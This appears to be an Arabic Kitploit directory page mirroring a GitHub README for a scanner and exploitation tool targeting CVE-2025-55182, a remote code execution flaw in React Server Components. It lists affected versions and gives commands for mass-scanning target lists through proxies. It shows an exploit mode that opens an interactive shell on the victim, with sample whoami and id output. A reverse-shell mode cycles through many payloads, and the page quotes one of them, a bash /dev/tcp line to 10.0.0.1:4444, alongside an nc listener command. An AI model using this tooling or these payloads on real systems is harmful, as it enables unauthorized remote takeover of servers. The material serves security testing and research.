Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182 — ماسح ضعف RCE حرج لمكونات خادم React (CVE-2025-55182). إطار استغلال آلي مع دعم متعدد للحمولات، وقدرات الوكيل، وتنفيذ أوامر تفاعلي. | Kitploit
أدوات/GitHubGitHub/alihzsec/cve-2025-55182
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

ماسح ضعف RCE حرج لمكونات خادم React (CVE-2025-55182). إطار استغلال آلي مع دعم متعدد للحمولات، وقدرات الوكيل، وتنفيذ أوامر تفاعلي.

عرض المستودع
1516منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح ومستغل CVE-2025-55182

[!Warning] هذا المستودع مخصص لأغراض تعليمية وبحثية فقط.

  • استخدم أدوات الإثبات المقدمة حصريًا على أنظمتك أو التي لديك إذن صريح لاختبارها.
  • الوصول غير المصرح به أو الاستغلال أو سوء استخدام أي مادة في هذا المستودع غير قانوني.
  • المؤلف (المؤلفون) لا يتحملون أي مسؤولية عن أي أضرار أو سوء استخدام أو عواقب قانونية ناتجة عن الاستخدام غير الصحيح.

🔍 نظرة عامة

CVE-2025-55182 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد تؤثر على إصدارات React Server Components 19.0.0 و19.1.0 و19.1.1 و19.2.0. تنبع هذه الثغرة من إلغاء التسلسل غير الآمن لحمولات طلبات HTTP إلى نقاط نهاية وظائف الخادم، مما يسمح للمهاجمين غير الموثوقين بتنفيذ تعليمات برمجية عشوائية عن بُعد.


🐛 تفاصيل الثغرة الأمنية

معرف CVE: CVE-2025-55182
الإصدارات المتأثرة:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 التثبيت

المتطلبات الأساسية

  • Python 3.8 أو أعلى
  • pip (مدير حزم Python)

الإعداد

  1. استنساخ المستودع
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. إنشاء بيئة افتراضية (موصى به)
python3 -m venv .venv
source .venv/bin/activate
  1. تثبيت التبعيات
pip install -r requirements.txt

📖 الاستخدام

python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

الوسائط

الوسائط

الوسيطةالوصف
-d, --detectionتشغيل في وضع الكشف (مسح الثغرات)
-e, --exploitتشغيل في وضع الاستغلال (استغلال هدف واحد)
-u, --url URLعنوان URL لهدف واحد للمسح/الاستغلال
-l, --list FILEملف يحتوي على قائمة عناوين URL الأهداف (وضع الكشف فقط)
-p, --proxy URLعنوان URL وكيل واحد (مثال: http://127.0.0.1:8080)
-pl, --proxy-list FILEملف يحتوي على قائمة عناوين URL للوكلاء (واحد لكل سطر)
-t, --threads Nعدد الخيوط المتزامنة (الافتراضي: 10، وضع الكشف فقط)
-s, --silentالوضع الصامت - عرض الأهداف الضعيفة فقط (وضع الكشف فقط)
-o, --output [FILE]حفظ الأهداف الضعيفة في ملف (وضع الكشف فقط). إذا لم يتم تقديم اسم ملف، يستخدم الافتراضي: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugتمكين تسجيل التصحيح - عرض تفاصيل الاستجابة ومحاولات إعادة المحاولة (غير متاح في الوضع الصامت)

🎯 وضع الكشف

مسح هدف واحد

python3 main.py -d -u https://example.com

مسح أهداف متعددة من ملف

python3 main.py -d -l targets.txt

المسح باستخدام وكيل

python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

الوضع الصامت (عرض الأهداف الضعيفة فقط)

python3 main.py -d -l targets.txt -s

المسح متعدد الخيوط

python3 main.py -d -l targets.txt -t 20

💣 وضع الاستغلال

شل تفاعلي

python3 main.py -e -u https://vulnerable-site.com

ثم اختر [i] للشل التفاعلي:

Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

شل عكسي

python3 main.py -e -u https://vulnerable-site.com

ثم اختر [r] للشل العكسي واختر نوع الحمولة:

الخيار 1: الحمولات الافتراضية (موصى به)

Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

ستحاول الأداة تلقائيًا أكثر من 17 حمولة شل عكسي مختلفة حتى تنجح إحداها.

الخيار 2: حمولة مخصصة

Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 المراجع

  • الإرشاد الأمني الرسمي لـ React
  • الإرشاد الأمني لـ Meta
  • الإرشاد الأمني لـ Vercel
  • الإرشاد الأمني لـ Next.js
  • تفاصيل CVE

إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة! ⭐
صنعت بـ ❤️ من أجل مجتمع الأمان
تنزيل الأداة